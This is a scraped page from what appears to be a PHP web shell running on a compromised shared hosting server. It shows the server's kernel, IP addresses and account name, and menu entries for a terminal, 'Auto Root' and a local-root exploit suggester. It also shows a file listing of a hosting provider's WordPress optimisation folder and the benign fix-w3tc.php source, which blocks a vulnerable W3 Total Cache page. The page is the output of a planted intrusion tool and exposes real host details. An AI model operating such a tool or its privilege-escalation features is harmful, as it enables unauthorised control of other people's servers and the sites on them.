Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
a2-optimized /
wordpress /
Delete
Unzip
Name
Size
Permission
Date
Action
A2ReCaptcha
[ DIR ]
drwxr-xr-x
2025-04-30 04:08
bin
[ DIR ]
drwxr-xr-x
2025-04-30 04:08
LSCWP_Default_Configuration.data
7.4
KB
-rw-r--r--
2025-04-29 15:41
Optimizations.php
241
B
-rw-r--r--
2025-04-29 15:41
am-bundle.php
1010
B
-rw-r--r--
2025-04-29 15:41
class.A2_Optimized_Private_Optimizations.php
36.09
KB
-rw-r--r--
2025-04-29 15:41
class.A2_Optimized_Private_Optimizations_v3.php
35.31
KB
-rw-r--r--
2025-04-29 15:41
cron-job.php
2.39
KB
-rw-r--r--
2025-04-29 15:41
fix-w3tc.php
2.02
KB
-rw-r--r--
2025-04-29 15:41
hcaptcha_lib.php
2.1
KB
-rw-r--r--
2025-04-29 15:41
managedwp_functions.php
3.78
KB
-rw-r--r--
2025-04-29 15:41
opt-init-variables.txt
797
B
-rw-r--r--
2025-04-29 15:41
optimize.sh
12.29
KB
-rw-r--r--
2025-04-29 15:41
p2-wp-opt-v1.data
7.39
KB
-rw-r--r--
2025-04-29 15:41
p2-wp-opt-v1.sh
20.48
KB
-rwxr-xr-x
2025-04-29 15:41
pagespeed.php
3.2
KB
-rw-r--r--
2025-04-29 15:41
privkey
0
B
-rw-r--r--
2025-04-29 15:41
pubkey
0
B
-rw-r--r--
2025-04-29 15:41
recaptcha_autoload.php
1.14
KB
-rw-r--r--
2025-04-29 15:41
recaptchalib.php
9.36
KB
-rw-r--r--
2025-04-29 15:41
recaptchalib_v2.php
2.95
KB
-rw-r--r--
2025-04-29 15:41
turbo-default.txt
7.39
KB
-rw-r--r--
2025-04-29 15:41
warp-imagick.json
940
B
-rw-r--r--
2025-04-29 15:41
wp-opt-v1.sh
41.12
KB
-rwxr-xr-x
2025-04-29 15:41
Save
Rename
<?php function a2_do_not_update_w3tc_warning() { return ' <p> <strong>Do not update W3 Total Cache.</strong><br> The latest release of W3 Total Cache is not stable and is likely to break your site. </p> <p> A2 Hosting is working on a solution for the future of A2 Optimized WP that includes a stable version of W3 Total Cache. </p> <p> If you have any questions, please contact <a href="https://www.a2hosting.com/">A2 Hosting Support</a>. </p> '; } function a2_w3tc_security_warning() { return ' <p> <strong>Do not use the W3TC support page.</strong><br>A security vulnerability has been found in W3 Total Cache on this page. </p> <p> <strong>A2 Hosting</strong> has prevented you from loading this page in an attempt to prevent this exploit from being executed. </p> <p> If you have any questions, please contact <a href="https://www.a2hosting.com/">A2 Hosting Support</a>. </p> '; } function a2_block_w3tc() { if ( isset($_REQUEST['action']) && ( isset($_REQUEST['plugin']) || isset($_REQUEST['checked']) ) ) { switch($_REQUEST['action']) { case 'install-plugin' : case 'update-plugin' : case 'upgrade-plugin' : if(strpos($_REQUEST['plugin'],'w3-total-cache') === 0){ wp_die(a2_do_not_update_w3tc_warning()); } break; case 'do-plugin-upgrade' : foreach($_REQUEST['checked'] as $checked) { if(strpos($checked,'w3-total-cache') === 0){ wp_die(a2_do_not_update_w3tc_warning()); } } default: break; } } } function fix_w3tc_security() { if ( isset($_REQUEST['page']) && $_REQUEST['page'] == 'w3tc_support'){ wp_die(a2_w3tc_security_warning()); } } if (is_admin()) { //add_filter('admin_init', 'a2_block_w3tc'); add_filter('admin_init', 'fix_w3tc_security'); }